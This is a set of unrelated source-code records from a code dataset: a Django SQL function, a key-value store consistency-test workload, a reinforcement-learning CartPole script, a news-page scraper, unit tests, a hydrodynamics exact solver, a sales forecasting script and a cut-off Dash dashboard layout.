+{"seq_id":"611295678","text":"from django.db.models import FloatField, Func, Value\n\n\nclass TrigramWordSimilarity(Func):\n output_field = FloatField()\n function = 'WORD_SIMILARITY'\n\n def __init__(self, expression, string, **extra):\n if not hasattr(string, 'resolve_expression'):\n string = Value(string)\n super().__init__(string, expression, **extra)\n\n\nclass LogAge(Func):\n \"\"\"Calculate log 2 of days since datetime column\"\"\"\n # Minimum age 1 day. Prevent log of zero error and unintended large\n # effect of log of very small inputs.\n output_field = FloatField()\n\n template = (\n f'greatest(1.0, log(2::numeric, ('\n 'abs(extract(epoch FROM (TIMESTAMP '\n \"'%(when)s' - \"\n 'COALESCE(%(table)s.%(timefield)s,%(table)s.created)'\n '))) / (60 * 60 * 24))::numeric'\n '))'\n )\n\n # greatest(1.0, log(2, number))\n # return at least 1.0 to avoid zero division or very skewed results\n # for logs close to zero\n\n # abs(extract(epoch FROM (when - then)))\n # Extract total seconds in timedelta `now - then`\n # `epoch` = 1970-01-01 = unix epoch = total seconds\n\n # / (60 * 60 * 24)\n # Divide by minutes and seconds and hours: seconds -> days\n\n # ::numeric\n # Cast result as `numeric` using PostgreSQL type cast notation\n # `numeric` = decimal type\n","sub_path":"django/utils/dbfuncs.py","file_name":"dbfuncs.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"538864451","text":"# Copyright 2020 Vectorized, Inc.\n#\n# Use of this software is governed by the Business Source License\n# included in the file licenses/BSL.md\n#\n# As of the Change Date specified in that file, in accordance with\n# the Business Source License, use of this software will be governed\n# by the Apache License, Version 2.0\n\nimport asyncio\nimport uuid\nimport random\nimport sys\nimport json\nimport logging\nimport traceback\nfrom collections import defaultdict\n\nfrom gobekli.kvapi import RequestCanceled, RequestTimedout, RequestViolated\nfrom gobekli.consensus import Violation\nfrom gobekli.workloads.common import (AvailabilityStatLogger, Stat,\n LinearizabilityHashmapChecker)\nfrom gobekli.logging import (m, log_latency)\n\ncmdlog = logging.getLogger(\"gobekli-cmd\")\n\n\nclass MWClient:\n def __init__(self, started_at, stat, checker, node, key):\n self.started_at = started_at\n self.stat = stat\n self.node = node\n self.checker = checker\n self.key = key\n self.last_write_id = str(uuid.uuid1())\n self.last_version = 0\n\n async def act(self):\n loop = asyncio.get_running_loop()\n prev_write_id = self.last_write_id\n curr_write_id = str(uuid.uuid1())\n curr_version = self.last_version + 1\n read_id = str(uuid.uuid1())\n\n op_started = None\n try:\n self.stat.assign(\"size\", self.checker.size())\n\n cmdlog.info(\n m(type=\"write_stared\",\n node=self.node.name,\n key=self.key,\n write_id=curr_write_id,\n read_id=read_id,\n prev_write_id=prev_write_id,\n version=curr_version,\n value=f\"42:{curr_version}\").with_time())\n\n self.checker.read_started(read_id, self.key)\n self.checker.cas_started(curr_write_id, self.key, prev_write_id,\n curr_version, f\"42:{curr_version}\")\n op_started = loop.time()\n response = await self.node.cas_aio(self.key, prev_write_id,\n f\"42:{curr_version}\",\n curr_write_id)\n data = response.record\n op_ended = loop.time()\n log_latency(\"ok\", op_ended - self.started_at,\n op_ended - op_started, self.node.idx, response.metrics)\n cmdlog.info(\n m(type=\"write_ended\",\n node=self.node.name,\n key=self.key,\n write_id=data.write_id,\n value=data.value).with_time())\n if data.write_id == curr_write_id:\n self.checker.cas_ended(curr_write_id, self.key)\n else:\n self.checker.cas_canceled(curr_write_id, self.key)\n self.checker.read_ended(read_id, self.key, data.write_id,\n data.value)\n\n read_version = int(data.value.split(\":\")[1])\n self.last_write_id = data.write_id\n\n if self.last_version < read_version:\n self.last_version = read_version\n\n self.stat.inc(self.node.name + \":ok\")\n self.stat.inc(\"all:ok\")\n except RequestTimedout:\n try:\n self.stat.inc(self.node.name + \":out\")\n op_ended = loop.time()\n log_latency(\"out\", op_ended - self.started_at,\n op_ended - op_started, self.node.idx)\n cmdlog.info(\n m(type=\"write_timedout\",\n node=self.node.name,\n write_id=curr_write_id,\n key=self.key).with_time())\n self.checker.read_canceled(read_id, self.key)\n self.checker.cas_timeouted(curr_write_id, self.key)\n except:\n e, v = sys.exc_info()[:2]\n cmdlog.info(\n m(\"unexpected error on write/timedout\",\n error_type=str(e),\n error_value=str(v),\n stacktrace=traceback.format_exc()).with_time())\n self.checker.abort()\n except RequestCanceled:\n try:\n self.stat.inc(self.node.name + \":err\")\n op_ended = loop.time()\n log_latency(\"err\", op_ended - self.started_at,\n op_ended - op_started, self.node.idx)\n cmdlog.info(\n m(type=\"write_canceled\",\n node=self.node.name,\n write_id=curr_write_id,\n 
key=self.key).with_time())\n self.checker.read_canceled(read_id, self.key)\n try:\n self.checker.cas_canceled(curr_write_id, self.key)\n except Violation as e:\n cmdlog.info(\n m(e.message,\n type=\"linearizability_violation\",\n write_id=curr_write_id).with_time())\n except:\n e, v = sys.exc_info()[:2]\n cmdlog.info(\n m(\"unexpected error on write/canceled\",\n error_type=str(e),\n error_value=str(v),\n stacktrace=traceback.format_exc()).with_time())\n self.checker.abort()\n except RequestViolated as e:\n try:\n self.checker.report_violation(\"internal violation: \" +\n json.dumps(e.info))\n except Violation as e:\n cmdlog.info(\n m(e.message,\n type=\"linearizability_violation\",\n write_id=curr_write_id).with_time())\n except Violation as e:\n cmdlog.info(\n m(e.message,\n type=\"linearizability_violation\",\n write_id=curr_write_id).with_time())\n except:\n e, v = sys.exc_info()[:2]\n cmdlog.info(\n m(\"unexpected error on write\",\n error_type=str(e),\n error_value=str(v),\n stacktrace=traceback.format_exc()).with_time())\n self.checker.abort()\n\n\nclass MRClient:\n def __init__(self, started_at, stat, checker, node, key):\n self.started_at = started_at\n self.stat = stat\n self.node = node\n self.key = key\n self.checker = checker\n\n async def act(self):\n loop = asyncio.get_running_loop()\n op_started = None\n read_id = str(uuid.uuid1())\n try:\n self.stat.assign(\"size\", self.checker.size())\n cmdlog.info(\n m(type=\"read_started\",\n node=self.node.name,\n read_id=read_id,\n key=self.key).with_time())\n self.checker.read_started(read_id, self.key)\n op_started = loop.time()\n response = await self.node.get_aio(self.key, read_id)\n read = response.record\n op_ended = loop.time()\n log_latency(\"ok\", op_ended - self.started_at,\n op_ended - op_started, self.node.idx, response.metrics)\n if read == None:\n cmdlog.info(\n m(type=\"read_404\",\n node=self.node.name,\n read_id=read_id,\n key=self.key).with_time())\n self.checker.read_none(read_id, self.key)\n else:\n cmdlog.info(\n m(type=\"read_ended\",\n node=self.node.name,\n read_id=read_id,\n key=self.key,\n write_id=read.write_id,\n value=read.value).with_time())\n self.checker.read_ended(read_id, self.key, read.write_id,\n read.value)\n self.stat.inc(self.node.name + \":ok\")\n self.stat.inc(\"all:ok\")\n except RequestTimedout:\n try:\n op_ended = loop.time()\n log_latency(\"out\", op_ended - self.started_at,\n op_ended - op_started, self.node.idx)\n self.stat.inc(self.node.name + \":out\")\n cmdlog.info(\n m(type=\"read_timedout\",\n node=self.node.name,\n read_id=read_id,\n key=self.key).with_time())\n self.checker.read_canceled(read_id, self.key)\n except:\n e, v = sys.exc_info()[:2]\n cmdlog.info(\n m(\"unexpected error on read/timedout\",\n error_type=str(e),\n error_value=str(v),\n stacktrace=traceback.format_exc()).with_time())\n self.checker.abort()\n except RequestCanceled:\n try:\n op_ended = loop.time()\n log_latency(\"err\", op_ended - self.started_at,\n op_ended - op_started, self.node.idx)\n self.stat.inc(self.node.name + \".err\")\n cmdlog.info(\n m(type=\"read_canceled\",\n node=self.node.name,\n read_id=read_id,\n key=self.key).with_time())\n self.checker.read_canceled(read_id, self.key)\n except:\n e, v = sys.exc_info()[:2]\n cmdlog.info(\n m(\"unexpected error on read/canceled\",\n error_type=str(e),\n error_value=str(v),\n stacktrace=traceback.format_exc()).with_time())\n self.checker.abort()\n except RequestViolated as e:\n try:\n self.checker.report_violation(\"internal violation: \" +\n 
json.dumps(e.info))\n except Violation as e:\n cmdlog.info(\n m(e.message,\n type=\"linearizability_violation\",\n read_id=read_id).with_time())\n except Violation as e:\n cmdlog.info(\n m(e.message, type=\"linearizability_violation\",\n read_id=read_id).with_time())\n except:\n e, v = sys.exc_info()[:2]\n cmdlog.info(\n m(\"unexpected error on read\",\n error_type=str(e),\n error_value=str(v),\n stacktrace=traceback.format_exc()).with_time())\n self.checker.abort()\n\n\nclass ValidationResult:\n def __init__(self, is_valid, error):\n self.is_valid = is_valid\n self.error = error\n\n\nclass COMRMWWorkload:\n def __init__(self, period_s, kv_nodes, numOfKeys, numOfReaders,\n ss_metrics):\n self.kv_nodes = kv_nodes\n self.period_s = period_s\n self.numOfKeys = numOfKeys\n self.numOfReaders = numOfReaders\n self.ss_metrics = ss_metrics\n self.is_active = True\n self.validation_result = None\n self.availability_logger = None\n\n def stop(self):\n self.is_active = False\n\n async def dispose(self):\n for kv_node in self.kv_nodes:\n await kv_node.close_aio()\n\n async def start(self):\n keys = list(map(lambda x: f\"key{x}\", range(0, self.numOfKeys)))\n\n checker = LinearizabilityHashmapChecker()\n\n for key in keys:\n wasSet = False\n for kv in self.kv_nodes:\n try:\n await kv.put_aio(key, \"42:0\", \"0\")\n checker.init(\"0\", key, 0, \"42:0\")\n wasSet = True\n break\n except:\n pass\n if not wasSet:\n self.is_active = False\n raise Exception(\"all kv_nodes rejected init write\")\n\n stat = Stat()\n dims = []\n dims.append(\"all:ok\")\n for kv in self.kv_nodes:\n dims.append(kv.name + \":ok\")\n dims.append(kv.name + \":out\")\n dims.append(kv.name + \":err\")\n dims.append(\"size\")\n self.availability_logger = AvailabilityStatLogger(stat, dims)\n clients = []\n tasks = []\n\n tasks.append(asyncio.create_task(self.availability_logger.start()))\n\n loop = asyncio.get_running_loop()\n started_at = loop.time()\n\n clients_by_endpoint = defaultdict(lambda: [])\n\n for key in keys:\n for kv in self.kv_nodes:\n mwclient = MWClient(started_at, stat, checker, kv, key)\n clients_by_endpoint[kv.address].append(mwclient)\n for _ in range(0, self.numOfReaders):\n mrclient = MRClient(started_at, stat, checker, kv, key)\n clients_by_endpoint[kv.address].append(mrclient)\n\n clients_groups = list(clients_by_endpoint.values())\n group_idx = 0\n while checker.is_valid and (not checker.is_aborted) and self.is_active:\n clients = clients_groups[group_idx]\n group_idx = (group_idx + 1) % len(clients_groups)\n\n i = random.randint(0, len(clients) - 1)\n client = clients[i]\n # TODO: keep track of tasks and wait them in the end\n _ = asyncio.create_task(client.act())\n await asyncio.sleep(self.period_s)\n\n self.validation_result = ValidationResult(checker.is_valid,\n checker.error)\n self.is_active = False\n\n self.availability_logger.stop()\n for task in tasks:\n await task\n\n return self.validation_result\n\n\nasync def start_comrsw_workload_aio(kv_nodes, numOfKeys, numOfReaders, timeout,\n ss_metrics):\n print(\"comrsw\")\n workload = COMRMWWorkload(1.0 / 400, kv_nodes, numOfKeys, numOfReaders,\n ss_metrics)\n task = asyncio.create_task(workload.start())\n\n loop = asyncio.get_running_loop()\n end_time = loop.time() + timeout\n while workload.is_active:\n if (loop.time() + 2) >= end_time:\n workload.stop()\n break\n await asyncio.sleep(2)\n\n result = await task\n await workload.dispose()\n print(result.is_valid)\n 
print(result.error)\n","sub_path":"src/consistency-testing/gobekli/gobekli/workloads/symmetrical_comrmw.py","file_name":"symmetrical_comrmw.py","file_ext":"py","file_size_in_byte":14466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"537203152","text":"import gym\nimport numpy as np\nfrom tqdm import tqdm\nfrom q_learning import learn_episode, play_episode\nfrom DQNSolver import DQNSolver\nfrom plotting import plot_avg_sparse_normal, plot_histogram\n\n\ndef main():\n\t# hyper params\n\tnum_learn_episodes = 1000\n\tnum_play_episodes = 1000\n\tepsilon = 1\n\teps_min = 0.1\n\teps_decay = (epsilon - eps_min) / num_learn_episodes * 4\n\treplay_memory_size = 100\n\tminibatch_size = 32\n\n\t# init\n\tenv = gym.make('CartPole-v1')\n\tdqn_solver = DQNSolver(env, replay_memory_size)\n\treward_memory_learn = np.array([])\n\treward_memory_play = np.array([])\n\n\t# Q-learning\n\tfor _ in tqdm(range(num_learn_episodes)):\n\t\ttotal_reward, dqn_solver, epsilon = learn_episode(\n\t\t\tdqn_solver=dqn_solver,\n\t\t\tenv=env,\n\t\t\tepsilon=epsilon,\n\t\t\tepsilon_min=eps_min,\n\t\t\tepsilon_decay=eps_decay,\n\t\t\tminibatch_size=minibatch_size\n\t\t)\n\t\treward_memory_learn = np.append(reward_memory_learn, total_reward)\n\n\t# playing\n\tfor _ in tqdm(range(num_play_episodes)):\n\t\ttotal_reward = play_episode(env, dqn_solver)\n\t\treward_memory_play = np.append(reward_memory_play, total_reward)\n\n\t# plotting\n\tplot_avg_sparse_normal(reward_memory_learn, num_learn_episodes)\n\tplot_histogram(reward_memory_play, num_learn_episodes)\n\n\t# saving the model parameters\n\tmodel = dqn_solver.get_model()\n\tmodel.save_weights('models/cartpole_model_weights_{}.h5'.format(num_learn_episodes))\n\tmodel.save('models/cartpole_model_{}.h5'.format(num_learn_episodes))\n\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"cartpole.py","file_name":"cartpole.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"620613733","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport pandas as pd\r\nfrom datetime import datetime\r\n\r\nr = requests.get('https://www.bloomberg.com/asia')\r\n\r\nsoup = BeautifulSoup(r.text, 'html.parser')\r\n\r\n#results_1 = soup.find_all('section', attrs={'class':'single-story-module__eyebrow'})\r\nresults_2 = soup.find_all('article', attrs={'data-type':'article'})\r\n\r\nrecords = []\r\n\r\n#Concat bloomberg since headline is missing\r\nfor result in results_2:\r\n date = result.find('time')['datetime'][0:-8]\r\n url = 'www.bloomberg.com' + result.find('a')['href']\r\n records.append((date, url))\r\n\r\n\r\ndf = pd.DataFrame(records, columns=['Date','Url'])\r\ndf['Date'] = pd.to_datetime(df['Date'])\r\ndf.sort_values(by='Date', ascending=False)\r\n\r\ndf.to_csv('Bloomberg.csv', index = False, encoding = 'utf-8')\r\n\r\n","sub_path":"Bloomberg.py","file_name":"Bloomberg.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"219756353","text":"from nlp_profiler.core import gather_duplicates, count_duplicates # noqa\n\ntext_with_a_number = '2833047 people live in this area'\ntext_with_duplicates = 'Everyone here is so hardworking. hardworking people. ' \\\n 'I think hardworking people are a good trait in our company'\n\n\ndef test_given_a_text_with_no_duplicates_when_parsed_then_return_empty():\n # given\n expected_results = {}\n\n # when\n actual_results = gather_duplicates(text_with_a_number)\n\n # then\n assert expected_results == actual_results, \\\n \"Should have NOT found duplicates in the text\"\n\n\ndef test_given_a_text_with_duplicates_when_parsed_then_return_the_duplicates():\n # given\n expected_results = {'.': 2, 'hardworking': 3, 'people': 2}\n\n # when\n actual_results = gather_duplicates(text_with_duplicates)\n\n # then\n assert expected_results == actual_results, \\\n \"Should have found multiple duplicates in the text\"\n\n\ndef test_given_a_text_with_duplicates_when_counted_then_return_the_duplicates_count():\n # given, when\n actual_results = count_duplicates(text_with_a_number)\n\n # then\n assert actual_results == 0, \\\n \"Should have NOT found duplicates in the text\"\n\n # given, when\n actual_results = count_duplicates(text_with_duplicates)\n\n # then\n assert actual_results == 3, \\\n \"Should have found a few duplicates in the text\"\n","sub_path":"tests/granular/test_duplicates.py","file_name":"test_duplicates.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"12112139","text":"r\"\"\"A Cog12 solver in Python.\n\nThis is a pure Python implementation of the Cog12 solution using Numpy.\nThe exact solution takes the form,\n\n.. math::\n\n \\rho(r,t) &= \\rho_0 \\, r^{-2k/(\\gamma + 1)}\n \\\\\n u(r,t) &=u_0 \\, r^{k(1 - \\gamma)/(1 + \\gamma)}\n \\\\\n T(r,t) &= \\frac{u_o^2\\, (1 - \\gamma)}{2 \\Gamma \\gamma}\n \\cdot\n r^{2 k (1 - \\gamma)/(1 + \\gamma)}\n \\\\ \n \\alpha &= (\\beta + 4)(1 - \\gamma) + \\frac{(k -1)(\\gamma + 1)}{2k}\n ~~(k \\ne 0)\n\nFree parameters: :math:`k`, :math:`\\rho_0`, :math:`u_0`, :math:`\\gamma`,\n:math:`\\Gamma`, and :math:`\\beta` (with :math:`\\alpha` a function of\n:math:`k`, :math:`\\beta`, and :math:`\\gamma`). Note that :math:`T > 0`\nonly when :math:`\\gamma < 1`.\n\n\"\"\"\n\nimport numpy as np\n\nfrom ...base import ExactSolver, ExactSolution\n\n\nclass Cog12(ExactSolver):\n \"\"\"Computes the solution to the Cog12 problem.\n\n Computes the solution to the Cog12 problem with defaults geometry = 3,\n gamma = 1.4, beta = 1.0, rho0 = 1.8, u0 = 2.3, Gamma = 40.\n \"\"\"\n\n parameters = {\n 'geometry': \"2=cylindrical, 3=spherical\",\n 'gamma': r\"specific heat ratio :math:`\\gamma \\equiv c_p/c_v`\",\n 'beta': r\"dimensionless constant :math:`\\beta` in Eq. :eq:`lambdaDef`\",\n 'rho0': \"density coefficient\",\n 'u0': \"velocity coefficient\",\n 'Gamma': \"|Gruneisen| gas parameter\",\n }\n geometry = 3\n gamma = 1.4\n beta = 1.0\n rho0 = 1.8\n u0 = 2.3\n Gamma = 40.\n \n def __init__(self, **kwargs):\n\n super(Cog12, self).__init__(**kwargs)\n\n if self.geometry not in [2, 3]:\n raise ValueError(\"geometry must be 2, or 3\")\n\n if self.gamma >= 1:\n print(\"*** warning: gamma > 1 gives T < 0 ***\")\n if self.beta < 1.0 or self.beta > 3.0:\n print(\"*** warning: beta lies outside range [1,3] ***\")\n \n def _run(self, r, t):\n\n bigGamma = self.Gamma\n k = self.geometry - 1.\n\n c1 = -2 * k / (self.gamma + 1)\n c2 = k * (1 - self.gamma) / (1 + self.gamma)\n c3 = 2 - (self.gamma - 1) * (k + 1)\n temp0 = pow(self.u0, 2) * (1 - self.gamma) / \\\n (2 * bigGamma * self.gamma)\n\n alpha = (self.beta + 4) * (1 + self.gamma) + (k - 1) / c3\n if alpha < -2.0 or alpha > -1.0:\n print(\"*** warning: alpha lies outside range [-2,-1] ***\")\n\n# a = 7.5657e-15 erg cm^-3 K^-4\n# = 1.3720e+02 erg cm^-3 ev^-4 using k_B = 8.6173324e-5 eV K^-1\n\n density = self.rho0 * pow(r, c1) * np.ones(shape=r.shape)\n velocity = self.u0 * pow(r, c2) * np.ones(shape=r.shape)\n temperature = temp0 * pow(r, 2 * c2) * np.ones(shape=r.shape) # [eV]\n pressure = bigGamma * density * temperature\n sie = pressure / density / (self.gamma - 1)\n\n return ExactSolution([r, density, velocity, temperature, pressure,\n sie],\n names=['position',\n 'density',\n 'velocity',\n 'temperature',\n 'pressure',\n 'specific_internal_energy'])\n\n\n \nclass PlanarCog12(Cog12):\n \"\"\"The planar Cog12 problem.\n \"\"\"\n\n parameters = {\n 'gamma': Cog12.parameters['gamma'],\n 'beta': Cog12.parameters['beta'],\n 'rho0': Cog12.parameters['rho0'],\n 'u0': Cog12.parameters['u0'],\n 'Gamma': Cog12.parameters['Gamma'], \n }\n geometry = 1\n\n \nclass CylindricalCog12(Cog12):\n \"\"\"The cylindrical Cog12 problem. \n \"\"\"\n\n parameters = {\n 'gamma': Cog12.parameters['gamma'],\n 'beta': Cog12.parameters['beta'],\n 'rho0': Cog12.parameters['rho0'],\n 'u0': Cog12.parameters['u0'],\n 'Gamma': Cog12.parameters['Gamma'], \n }\n geometry = 2\n\n\nclass SphericalCog12(Cog12):\n \"\"\"The spherical Cog12 problem. 
\n \"\"\"\n\n parameters = {\n 'gamma': Cog12.parameters['gamma'],\n 'beta': Cog12.parameters['beta'],\n 'rho0': Cog12.parameters['rho0'],\n 'u0': Cog12.parameters['u0'],\n 'Gamma': Cog12.parameters['Gamma'], \n }\n geometry = 3\n","sub_path":"exactpack/solvers/cog/cog12.py","file_name":"cog12.py","file_ext":"py","file_size_in_byte":4176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
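# Added usage sketch (not part of ExactPack): evaluating the closed form from the
# module docstring directly with numpy, to cross-check the density and velocity
# branches of _run for the spherical defaults.
import numpy as np

gamma, k, rho0, u0 = 1.4, 2.0, 1.8, 2.3   # spherical: k = geometry - 1
r = np.linspace(0.1, 1.0, 5)
density = rho0 * r ** (-2 * k / (gamma + 1))            # rho0 * r^(-2k/(gamma+1))
velocity = u0 * r ** (k * (1 - gamma) / (1 + gamma))    # u0 * r^(k(1-gamma)/(1+gamma))
print(density, velocity)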
+{"seq_id":"203110078","text":"#%%\n\nimport itertools\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport cloudpickle as cpkl\nfrom pathlib import Path\nimport numpy as np\nimport datetime\nfrom functools import reduce\nfrom fbprophet import Prophet\n#%% \n#df_train = pd.read_csv(\n# 'input/train.csv', usecols=[1, 2, 3, 4, 5], dtype={'onpromotion': str},\n# converters={'unit_sales': lambda u: float(u) if float(u) > 0 else 0},\n# skiprows=range(1, 124035460)\n#)\ntrain_pkl_file = 'input/train_pkl'\ntest_pkl_file = 'input/test_pkl'\nif not Path(train_pkl_file).is_file():\n train = pd.read_csv(\"input/train.csv\")\n print(train.head())\n transactions = pd.read_csv(\"input/transactions.csv\")\n stores = pd.read_csv(\"input/stores.csv\")\n oil = pd.read_csv(\"input/oil.csv\")\n items = pd.read_csv(\"input/items.csv\")\n holidays_events = pd.read_csv(\"input/holidays_events.csv\")\n train_dumps = cpkl.dumps([train,transactions,stores,oil,items,holidays_events])\n with open(train_pkl_file,'wb') as f:\n f.write(train_dumps)\nelse:\n print('Loading train dump')\n train,transactions,stores,oil,items,holidays_events = cpkl.loads(open(train_pkl_file,'rb').read())\nif not Path(test_pkl_file):\n test = pd.read_csv(\"input/test.csv\")\n test_dumps = cpkl.dumps(test)\n with open(test_pkl_file,'wb') as f:\n f.write(test_dumps)\nelse:\n print(\"Loading test dump\")\n test = cpkl.loads(open(test_pkl_file,'rb').read())\n# log transform\n#train[\"unit_sales\"] = train[\"unit_sales\"].apply(np.log1p)\n# Fill NAs\ntrain.loc[:, \"unit_sales\"].fillna(0, inplace=True)\n# Assume missing entris imply no promotion\ntrain.loc[:, \"onpromotion\"].fillna(\"False\", inplace=True)\n\n#%%\nstores_by_transactions = transactions.groupby('store_nbr',as_index=False)['transactions'].sum()\n#choose store_nbrs 42,54 and 45 for training\ntraining_store_nbrs = [42,54,45]\ntrain_samp = train.loc[train['store_nbr'].isin(training_store_nbrs)]\ntrain_samp.loc[:,\"date\"] = pd.to_datetime(train_samp.date)\ntrain_samp = train_samp.merge(items,on='item_nbr')\ntrans_samp = transactions.loc[transactions['store_nbr'].isin(training_store_nbrs)]\ntrans_samp.loc[:,\"date\"] = pd.to_datetime(trans_samp.date)\ntrans_samp = trans_samp.merge(stores,on='store_nbr')\ntrans_samp = trans_samp.merge(holidays_events,on='date',how=\"left\")\n\n#%%\n#subset most sold item in the store with most sales for testing forecast methods\nperStorePerItem=True\nlogTransform = False\ndate_range_fit = datetime.datetime(2016,8,16)\ndate_range_forecast = datetime.datetime(2016,9,1)\nif perStorePerItem:\n storex = 45\n itemx = 414750\n trainx = train_samp[train_samp.store_nbr==45]\n trainx_item = train_samp.loc[(train_samp.store_nbr==storex) & (train_samp.item_nbr==itemx)]\n #trainx_item = trainx_item.groupby(['item_nbr','date'],as_index=False)['unit_sales'].sum()\n trainx_itemlg = trainx_item.copy()\n if logTransform:\n trainx_itemlg.unit_sales = trainx_itemlg.unit_sales.apply(np.log1p) \n trainx_item_forfit = trainx_itemlg.loc[trainx_itemlg.date=date_range_fit )& (trainx_itemlg.date=date_range_fit) &\n (trainx_item.date=date_range_fit]\nplt.scatter(futureforecast.ds.astype(np.int64),futureforecast.yhat)\nprint(\"forecast {0:.4f}, overallmean {1:.4f}, overallmean_forfit{2:0.4f},meanoverforecast {3:.4f}\".format(\n NWRMSLE(trainx_item_forforecast.unit_sales,futureforecast.yhat,WEIGHTS,logTransform),\n NWRMSLE(trainx_item_forforecast.unit_sales,overallmean,WEIGHTS,logTransform),\n 
NWRMSLE(trainx_item_forforecast.unit_sales,overallmeanb4fit,WEIGHTS,logTransform),\n NWRMSLE(trainx_item_forforecast.unit_sales,mean_over_forecast_period,WEIGHTS,logTransform)))\n","sub_path":"fbprophet-starter.py","file_name":"fbprophet-starter.py","file_ext":"py","file_size_in_byte":5191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
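# Added sketch (not in the original file, where the helper's definition was cut
# off by extraction): the Favorita competition's NWRMSLE as usually written -- a
# weighted RMSE over log1p-transformed sales. The log_transformed flag mirrors
# the script's logTransform option of passing already log-transformed values.
import numpy as np

def nwrmsle(actual, predicted, weights, log_transformed=False):
    a, p = np.asarray(actual, float), np.asarray(predicted, float)
    if not log_transformed:
        # clip negatives to zero before log1p, as unit_sales cannot be negative
        a, p = np.log1p(np.clip(a, 0, None)), np.log1p(np.clip(p, 0, None))
    w = np.asarray(weights, float)
    return float(np.sqrt(np.sum(w * (a - p) ** 2) / np.sum(w)))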
+{"seq_id":"416410607","text":"import pandas as pd\nimport plotly.express as px\nimport plotly.graph_objects as go\nimport numpy as np\nimport dash # (version 1.12.0) pip install dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\nfrom app import app, df\nimport dash_table as dt\n\nddff_data={'Primary': 'ITA12L', 'Secondary': 'ITA12S', 'Win Rate%': 0.463, 'Presence Rate%': 0.009, 'Kill': 0.526, 'Dead': 0.747}\nddff = pd.DataFrame(ddff_data, columns=['Primary', 'Secondary', 'Win Rate%', 'Presence Rate%', 'Kill', 'Dead'], index=[])\n\nlayout = html.Div([\n\n #title\n html.Div([\n html.H1(\"Operators' Weapons and Capability\", style={'font-family': 'Helvetica',\n \"margin-top\": \"25\",\n \"margin-bottom\": \"0\"}, className='eight columns'),\n ], className='row'),\n #Dropdown Menu\n html.Div([\n html.Div([\n html.P(\"Platform:\"),\n dcc.Dropdown(\n id=\"platform_select\",\n options=[\n {\"label\": \"All\", \"value\": \"None\"},\n {\"label\": \"PC\", \"value\": \"PC\"},\n {\"label\": \"PS4\", \"value\": \"PS4\"},\n {\"label\": \"XONE\", \"value\": \"XONE\"}\n ],\n multi=False,\n value='None',\n clearable=False,\n )\n ], className='two columns', style={'margin-top': '10'}),\n html.Div([\n html.P('Rank:'),\n dcc.Dropdown(\n id=\"rank_select\",\n options=[\n {\"label\": \"All\", \"value\": \"None\"},\n {\"label\": \"Unranked\", \"value\": \"Unranked\"},\n {\"label\": \"Copper\", \"value\": \"Copper\"},\n {\"label\": \"Bronze\", \"value\": \"Bronze\"},\n {\"label\": \"Silver\", \"value\": \"Silver\"},\n {\"label\": \"Gold\", \"value\": \"Gold\"},\n {\"label\": \"Platinum\", \"value\": \"Platinum\"},\n {\"label\": \"Diamond\", \"value\": \"Diamond\"}\n ],\n multi=False,\n value='None',\n clearable=False,\n )\n ], className='two columns', style={'margin-top': '10'}),\n html.Div([\n html.P('Map:'),\n dcc.Dropdown(\n id=\"map_select\",\n options=[\n {\"label\": \"All\", \"value\": \"None\"},\n {\"label\": \"BANK\", \"value\": \"BANK\"},\n {\"label\": \"BARTLETT U.\", \"value\": \"BARTLETT U.\"},\n {\"label\": \"BORDER\", \"value\": \"BORDER\"},\n {\"label\": \"CHALET\", \"value\": \"CHALET\"},\n {\"label\": \"CLUB HOUSE\", \"value\": \"CLUB HOUSE\"},\n {\"label\": \"COASTLINE\", \"value\": \"COASTLINE\"},\n {\"label\": \"CONSULATE\", \"value\": \"CONSULATE\"},\n {\"label\": \"FAVELAS\", \"value\": \"FAVELAS\"},\n {\"label\": \"HEREFORD BASE\", \"value\": \"HEREFORD BASE\"},\n {\"label\": \"HOUSE\", \"value\": \"HOUSE\"},\n {\"label\": \"KAFE DOSTOYEVSKY\", \"value\": \"KAFE DOSTOYEVSKY\"},\n {\"label\": \"KANAL\", \"value\": \"KANAL\"},\n {\"label\": \"OREGON\", \"value\": \"OREGON\"},\n {\"label\": \"PLANE\", \"value\": \"PLANE\"},\n {\"label\": \"SKYSCRAPER\", \"value\": \"SKYSCRAPER\"},\n {\"label\": \"YACHT\", \"value\": \"YACHT\"}\n ],\n multi=False,\n value='None',\n clearable=False,\n )\n ], className='two columns', style={'margin-top': '10'}),\n html.Div([\n html.P('Operator:'),\n dcc.Dropdown(\n id=\"operator_select\",\n options=[\n {\"label\": \"BOPE-CAPITAO\", \"value\": \"BOPE-CAPITAO\"},\n {\"label\": \"BOPE-CAVEIRA\", \"value\": \"BOPE-CAVEIRA\"},\n {\"label\": \"G.E.O.-JACKAL\", \"value\": \"G.E.O.-JACKAL\"},\n {\"label\": \"G.E.O.-MIRA\", \"value\": \"G.E.O.-MIRA\"},\n {\"label\": \"GIGN-DOC\", \"value\": \"GIGN-DOC\"},\n {\"label\": \"GIGN-MONTAGNE\", \"value\": \"GIGN-MONTAGNE\"},\n {\"label\": \"GIGN-ROOK\", \"value\": \"GIGN-ROOK\"},\n {\"label\": \"GIGN-TWITCH\", \"value\": \"GIGN-TWITCH\"},\n {\"label\": 
